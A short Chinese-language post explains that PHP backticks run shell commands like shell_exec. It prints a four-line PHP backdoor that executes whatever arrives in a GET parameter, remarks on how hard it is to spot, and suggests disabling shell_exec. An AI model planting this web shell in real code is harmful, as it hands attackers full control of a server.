下面这段代码发现了什么,感觉好像没什么别的东西吧 就是打印个字符串而已~
$safe = $_GET['s'];
if (isset($safe)){
echo `$safe`;
}
其实不然,其实我也是刚知道的,反撇号不同于单引号,长相不错,不过功能大相径庭。
单引号'就是个简单字符串
反撇号`确实一个函数的简化,而那个函数shell_exec都知道是干嘛的吧。
也就一个小马而已,最多拿个shell而已,带走整个服务器,没什么大不了。
很机智的一个后门,绝逼看不出来~反正我第一眼没发现什么
所以,如果没什么大用shell_exec函数还是禁止吧,一般没卵用。
本函数仅供学习。
